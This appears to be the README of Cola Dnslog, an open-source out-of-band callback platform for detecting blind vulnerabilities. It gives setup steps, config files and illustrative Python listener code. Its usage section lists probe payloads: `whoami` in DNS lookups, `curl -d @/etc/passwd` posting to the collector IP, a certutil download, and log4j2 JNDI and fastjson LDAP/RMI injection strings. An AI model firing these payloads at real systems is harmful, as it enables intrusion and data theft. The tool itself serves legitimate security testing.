## Cola-Dnslog <https://github.com/AbelChe/cola_dnslog>
![Language](https://img.shields.io/badge/Language-Python-blue)
![Author](https://img.shields.io/badge/Author-AbelChe-orange)
![GitHub stars](https://img.shields.io/github/stars/AbelChe/cola_dnslog.svg?style=flat&logo=github)
![Version](https://img.shields.io/badge/Version-V0.0.1-red)
![Time](https://img.shields.io/badge/Join-20220829-green)

Cola Dnslog is a more capable dnslog platform (an out-of-band helper for detecting vulnerabilities that produce no direct response in the application):

- fully open source
- supports the DNS, HTTP, LDAP and RMI protocols
- exposes an API so it can be driven from other tools
- supports DingTalk robot and Bark notifications
- one-command Docker deployment


------

Technologies and frameworks involved:

`dns` `http` `ldap` `rmi` `webui` `vue-element-admin` `fastapi` `sqlite`

Vulnerability classes it can help detect:

`log4j2` `fastjson` `ruoyi` `Spring` `RCE` `Blind SQL` `Blind XXE`

Features:

`Dingtalk Robot` `Bark` `API` `ldaplog` `rmilog` `Docker`

## 🥯 Usage

> Assume the domain you bought is `example.com`
>
> and your VPS IP is `1.1.1.1`

### Domain

Buy a domain yourself and delegate its name servers to the host that runs cola_dnslog. The delegation is what makes the whole thing work: once the registrar's NS records for `example.com` point at your VPS, every lookup for any name under `example.com`, including names nobody has ever defined, is forwarded by the world's resolvers to the cola_dnslog DNS listener, which is where the hits get recorded.

Using GoDaddy as the example:

1. In the DNS configuration, open the three-dot menu at the top right and click Host Names

![image-20220717175903352](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220717175903352.png)

2. Add or edit the host names as shown below; the IP address is your VPS address (these are the glue records for `ns1` and `ns2`)

![image-20220717180002176](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220717180002176.png)

3. Back in DNS management, change the domain's name servers to `ns1.example.com` and `ns2.example.com`

![image-20220717180242944](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220717180242944.png)

Delegation changes take a while to propagate. Once the logserver is up, resolve a throwaway subdomain (such as `test.<your-logid>.example.com`) from a different network and confirm the query shows up on the Dnslog page before relying on the platform for a test.

### Installation

#### Docker (recommended)

##### One-command start (recommended)

1. Fetch the source

```sh
git clone https://github.com/Abelche/cola_dnslog.git
cd cola_dnslog
```

2. Edit the `environment` variables in docker-compose.yml

```yml
...
server:
  ...
  environment:
    DNS_DOMAIN: example.com        # your own domain
    NS1_DOMAIN: ns1.example.com    # ns1 host name
    NS2_DOMAIN: ns2.example.com    # ns2 host name
    SERVER_IP: 1.1.1.1             # VPS IP
...
front:
  ...
  environment:
    API_BASE_URL: 'http://1.1.1.1:28001'   # http://<vps ip>:28001
...

```

3. Start

```sh
docker-compose up -d
```

4. After startup, read the Docker logs or info.txt to get the account details

> On first run the server process creates an info.txt in its root directory to record the generated account details

```sh
docker-compose logs
docker exec -it <container_id> cat /coladnslog/info.txt
```

![image-20220812005813825](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220812005813825.png)

> To use different ports, edit the `ports` mappings in `docker-compose.yml`

> The server container publishes UDP 53 and TCP 80 on the host, so nothing else (for example systemd-resolved on Ubuntu) may already be bound there, and the VPS firewall has to allow 53/udp, 80, 1099, 1389 and 28001 inbound. info.txt holds the initial password and API token; treat it as a secret, and do not leave the API and web UI reachable from the whole internet if you can restrict them.



##### Separate front-end and back-end deployment

Server:

```sh
git clone https://github.com/Abelche/cola_dnslog.git
cd cola_dnslog

docker build -t coladnslog_server -f Dockerfile_server .
docker run -itd -p 53:53/udp \
    -p 80:80 \
    -p 1099:1099 \
    -p 1389:1389 \
    -p 28001:28001 \
    -e DNS_DOMAIN=example.com \
    -e NS1_DOMAIN=ns1.example.com \
    -e NS2_DOMAIN=ns2.example.com \
    -e SERVER_IP=1.1.1.1 \
    --name ColaDnslog_server coladnslog_server
```

Client (web UI):

```sh
git clone https://github.com/Abelche/cola_dnslog.git
cd cola_dnslog

sudo docker build -t coladnslogfront -f Dockerfile_front .
sudo docker run -itd -p 18080:18080 coladnslogfront
```

Like the `front` service in docker-compose.yml, the front-end container expects `API_BASE_URL` to point at the server's API (`http://1.1.1.1:28001` in this example); set it in the container's environment if the UI cannot reach the API.



#### Install from source

Four steps in total.

##### **Step 1: fetch the source**

Fetch the source:

```sh
git clone https://github.com/Abelche/cola_dnslog.git
```

> I like to run the services in the background under `tmux`

##### **Step 2: start the webserver**

Install the Python dependencies (Python >= 3.7).

Note: Python 3.7 or later is required; older versions have compatibility problems. If you juggle several Python versions, conda is recommended.

```sh
cd cola_dnslog
pip install -r requirements.txt
```

Edit `config.yaml` in the project root.

The keys that must be changed are `DNS_DOMAIN`, `NS1_DOMAIN`, `NS2_DOMAIN` and `SERVER_IP`.

Optional: change `HTTP_RESPONSE_SERVER_VERSION` to spoof the `Server` header in HTTP responses, so the listener does not advertise what it is to whoever inspects the callback.

`PASSWORD_SALT` is mixed into the stored password hashes; generate a fresh random value for each deployment rather than reusing the example.

```yaml
global:
  DB_FILENAME: sqlite.db

logserver:
  DNS_DOMAIN: example.com
  NS1_DOMAIN: ns1.example.com
  NS2_DOMAIN: ns2.example.com
  SERVER_IP: 1.1.1.1
  DNS_PORT: 53
  HTTP_HOST: 0.0.0.0
  HTTP_PORT: 80
  HTTP_RESPONSE_SERVER_VERSION: nginx
  LDAP_HOST: 0.0.0.0
  LDAP_PORT: 1389
  RMI_HOST: 0.0.0.0
  RMI_PORT: 1099

webserver:
  HOST: 0.0.0.0
  PORT: 28001
  PASSWORD_SALT: any long random string of your own, e.g. cuau89j2iifdas8
```
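To make two of these keys concrete, here is a minimal HTTP log listener in the style of the project's httplog. It is an added example, not cola_dnslog's own code: it takes the logid from the first path segment (the convention the usage section's `curl 1.1.1.1/qrq/...` examples follow), records every request in an in-memory list standing in for the sqlite table, and answers with whatever `HTTP_RESPONSE_SERVER_VERSION` says in the `Server` header. The `CONFIG` dict, the `HTTP_LOG` list and the `demo()` helper are constructed for the illustration; the demo binds an OS-chosen port on loopback so it runs anywhere.

```python
"""Minimal httplog-style listener: logid from the path, spoofed Server header.

Added example, not cola_dnslog's code. CONFIG mirrors the logserver section
of config.yaml; HTTP_LOG stands in for the database table.
"""
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

CONFIG = {
    "HTTP_HOST": "127.0.0.1",
    "HTTP_PORT": 0,                            # 0 = OS-chosen port, for the demo only
    "HTTP_RESPONSE_SERVER_VERSION": "nginx",   # value sent in the Server: header
}

HTTP_LOG = []   # constructed stand-in for the httplog table


def logid_from_path(path):
    """First path segment is the logid: '/qrq/some/info' -> 'qrq', '/' -> ''."""
    parts = [p for p in path.split("?", 1)[0].split("/") if p]
    return parts[0] if parts else ""


class HttpLogHandler(BaseHTTPRequestHandler):
    def version_string(self):
        # BaseHTTPRequestHandler calls this to fill the Server: header.
        return CONFIG["HTTP_RESPONSE_SERVER_VERSION"]

    def log_message(self, fmt, *args):
        pass   # the record goes to HTTP_LOG, not to stderr

    def _record(self, body):
        HTTP_LOG.append({
            "logid": logid_from_path(self.path),
            "method": self.command,
            "path": self.path,
            "client": self.client_address[0],
            "user_agent": self.headers.get("User-Agent", ""),
            "body": body,
        })
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok")

    def do_GET(self):
        self._record(b"")

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        self._record(self.rfile.read(length))


def start_server():
    """Run the listener on a daemon thread; returns (server, base_url)."""
    server = HTTPServer((CONFIG["HTTP_HOST"], CONFIG["HTTP_PORT"]), HttpLogHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    host, port = server.server_address[:2]
    return server, f"http://{host}:{port}"


def demo():
    """Replay the README's two curl probes against the local listener.

    Returns (Server header seen by the client, list of recorded hits)."""
    server, base = start_server()
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore proxy env
    try:
        with opener.open(f"{base}/qrq/some/info") as resp:
            server_header = resp.headers.get("Server")
        # constructed sample body standing in for /etc/passwd
        req = urllib.request.Request(f"{base}/qrq/postdata", data=b"root:x:0:0:root:/root:/bin/bash\n")
        opener.open(req).close()
    finally:
        server.shutdown()
        server.server_close()
    return server_header, list(HTTP_LOG)


if __name__ == "__main__":
    header, hits = demo()
    print("Server header:", header)
    for rec in hits:
        print(rec["logid"], rec["method"], rec["path"], rec["body"][:24])
```

Overriding `version_string()` is all it takes to change the header on Python's stock server; the real project presumably does the equivalent in its own HTTP stack. Note that a path with no logid (the `certutil ... http://1.1.1.1/x` example) records an empty logid here, so whatever the real server does with such hits, make sure your own probes carry one.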

Start the webserver and the logserver. The webserver must be started first, because it initialises the database; once that is done it prints the account, password, token, logid and so on to the terminal.

```sh
chmod +x start_webserver
./start_webserver
```

![image-20220730035846090](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730035846090.png)



##### **Step 3: start the logserver**

With the default config the logserver binds UDP 53 and TCP 80, so it needs root (or `CAP_NET_BIND_SERVICE`) and a host where nothing else already listens on those ports.

```sh
chmod +x start_logserver
./start_logserver
```

![image-20220730160132103](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730160132103.png)



##### **Step 4: start the front end**

Now the front end (it does not have to live on the same host as the webserver; you could even package it as a desktop client with Electron). First edit its config file `.env.production`:

```sh
cd src/app/front
vim .env.production
```

```ini
# just a flag
ENV = 'production'

# base api
VUE_APP_BASE_API = 'http://1.1.1.1:28001'

TARGET_API = 'http://1.1.1.1:28001'
```

Then install the npm dependencies, build, and serve the result over HTTP (any HTTP server will do; for convenience I just use Python's built-in one):

```sh
cd src/front
npm install
npm run build:prod

cd dist
python3 -m http.server 18001
```

All three components (webserver, logserver and the web UI) are now running.

Open http://1.1.1.1:18001 and you should see the login page.

Have fun!

### DingTalk robot

Create a robot in a DingTalk group; under its security settings add the custom keyword `coladnslog` (DingTalk only delivers webhook messages that contain one of the configured keywords, and the platform's notifications contain this one).

![image-20220731231424000](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731231424000.png)

Take the token from the webhook URL; note that only the token is needed, not the whole URL.

![image-20220731231912885](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731231912885.png)

In the web UI, set Dingtalk Robot Token to that token and click Update to save.

![image-20220802020311279](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220802020311279.png)

Result:

<img src="https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731231301577.png" alt="image-20220731231301577" style="zoom:33%;" />

### Bark

[Finb/Bark: Bark is an iOS App which allows you to push custom notifications to your iPhone (github.com)](https://github.com/Finb/Bark)

[Finb/bark-server: Backend of Bark (github.com)](https://github.com/Finb/bark-server)

As above: in the web UI, turn on the Bark switch, set the Bark URL, and click Update to save.

![image-20220802015907678](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220802015907678.png)

Result:

<img src="https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220802015642879.png" alt="image-20220802015642879" style="zoom: 25%;" />

### How to use it

As above, assume the domain and IP are `example.com` and `1.1.1.1`, and that our account's logid is `qrq`. Every probe carries the logid, which is how the platform attributes a hit to your account.

#### DNS

```sh
nslookup `whoami`.qrq.example.com
ping `whoami`.qrq.example.com
```
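The Domain section above asks you to delegate `example.com` to the VPS, and the probe above puts data and the logid into the query name. The following added example (not cola_dnslog's code) is the minimal authoritative responder logic that ties the two together: it parses a DNS query, pulls the logid out of the label directly left of `DNS_DOMAIN` (the convention the `whoami`.qrq.example.com probe uses; how the real server matches logids beyond that is an assumption), answers `NS` for the apex with `ns1`/`ns2` so delegation checks succeed, and answers everything else with `SERVER_IP` at TTL 0. The packet handling is done by hand with `struct` so it runs offline; `build_query` and `parse_answers` are constructed helpers playing the resolver's part.

```python
"""Minimal authoritative-DNS responder logic of the kind a dnslog platform runs.

Added example, not cola_dnslog's code. DNS_DOMAIN, NS_DOMAINS and SERVER_IP
mirror config.yaml; everything else is constructed for the illustration.
"""
import struct

DNS_DOMAIN = "example.com"
NS_DOMAINS = ("ns1.example.com", "ns2.example.com")
SERVER_IP = "1.1.1.1"
TYPE_A, TYPE_NS, CLASS_IN = 1, 2, 1


def encode_name(name):
    """'a.b.com' -> b'\\x01a\\x01b\\x03com\\x00' (uncompressed labels)."""
    return b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".")) + b"\x00"


def decode_name(buf, off):
    """Read a (possibly compressed) name at buf[off]; returns (name, next offset)."""
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            break
        if n & 0xC0 == 0xC0:                       # compression pointer
            ptr = ((n & 0x3F) << 8) | buf[off]
            labels.append(decode_name(buf, ptr)[0])
            return ".".join(labels), off + 1
        labels.append(buf[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels), off


def build_query(qname, qtype=TYPE_A, txid=0x1234):
    """What a resolver sends us: header with RD set and one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", qtype, CLASS_IN)


def split_logid(qname):
    """'<data>.qrq.example.com' -> ('qrq', '<data>'); None for the apex, the
    NS hosts themselves, or names outside our zone."""
    q = qname.lower().rstrip(".")
    if q == DNS_DOMAIN or q in NS_DOMAINS or not q.endswith("." + DNS_DOMAIN):
        return None
    labels = q[:-len(DNS_DOMAIN) - 1].split(".")
    return labels[-1], ".".join(labels[:-1])


def _rr(name, rtype, rdata, ttl):
    return encode_name(name) + struct.pack("!HHIH", rtype, CLASS_IN, ttl, len(rdata)) + rdata


def build_response(query, log):
    """Answer one query packet and append any hit to `log`.

    Names under the zone get SERVER_IP with TTL 0: a cached answer would let
    the resolver serve the next probe without asking us, and that hit would
    never be logged. NS for the apex returns our two name servers."""
    txid, qflags, qdcount = struct.unpack("!HHH", query[:6])
    qname, off = decode_name(query, 12)
    qtype, _ = struct.unpack("!HH", query[off:off + 4])
    question = query[12:off + 4]

    hit = split_logid(qname)
    if hit:
        log.append({"logid": hit[0], "data": hit[1], "qname": qname})

    if qname.lower().rstrip(".") == DNS_DOMAIN and qtype == TYPE_NS:
        answers = [_rr(qname, TYPE_NS, encode_name(ns), 3600) for ns in NS_DOMAINS]
    else:
        answers = [_rr(qname, TYPE_A, bytes(int(x) for x in SERVER_IP.split(".")), 0)]

    flags = 0x8400 | (qflags & 0x0100)             # QR=1, AA=1, RD copied from the query
    header = struct.pack("!HHHHHH", txid, flags, qdcount, len(answers), 0, 0)
    return header + question + b"".join(answers)


def parse_answers(resp):
    """Decode the answer section into (name, type, ttl, rdata-as-text) tuples."""
    _, _, qd, an = struct.unpack("!HHHH", resp[:8])
    off = 12
    for _ in range(qd):
        _, off = decode_name(resp, off)
        off += 4
    out = []
    for _ in range(an):
        name, off = decode_name(resp, off)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
        off += 10
        rdata = resp[off:off + rdlen]
        off += rdlen
        text = ".".join(map(str, rdata)) if rtype == TYPE_A else decode_name(rdata, 0)[0]
        out.append((name, rtype, ttl, text))
    return out


if __name__ == "__main__":
    hits = []
    for q in ("root.qrq.example.com", "example.com", "ns1.example.com"):
        r = build_response(build_query(q, TYPE_NS if q == DNS_DOMAIN else TYPE_A), hits)
        print(q, parse_answers(r))
    print("logged:", hits)
```

The TTL is the part worth remembering when a probe "does not show up": if a listener hands out cached-friendly answers, the second `ping` of the same name from the same resolver never reaches it. It also explains why the probe data goes into the name rather than anywhere else: the name is the only thing a blind lookup carries.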

#### HTTP

```sh
curl 1.1.1.1/qrq/some/info
curl -d @/etc/passwd 1.1.1.1/qrq/postdata
certutil -urlcache -split -f http://1.1.1.1/x x
```

#### LDAP

Usable for log4j2, fastjson and the like.

Note that the last path component must end with the logid, e.g. `ldapqrq`, `xxxxqrq`, `qrq`, `xxx/qrq`.

```
${jndi:ldap://1.1.1.1:1389/ldapqrq}
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://1.1.1.1:1389/ldapqrq", "autoCommit":true}
```

#### RMI

Same as above, for log4j2, fastjson and the like.

```
${jndi:rmi://1.1.1.1:1099/rmiqrq}
{ "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://1.1.1.1:1099/rmiqrq", "autoCommit":true } }
```

## 👀 Overview

### Login

![image-20220730151326711](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730151326711.png)



### Home

![image-20220731143149729](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731143149729.png)



### Dnslog

![image-20220730151604227](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730151604227.png)



### Httplog

![image-20220730151741311](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730151741311.png)



### Ldaplog

![image-20220730151826344](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730151826344.png)



### Rmilog

![image-20220730151921478](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730151921478.png)



### Account details

![image-20220801003540673](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220801003540673.png)



### DingTalk robot

<img src="https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731231301577.png" alt="image-20220731231301577" style="zoom: 25%;" />



### Bark

<img src="https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220802015642879.png" alt="image-20220802015642879" style="zoom: 25%;" />
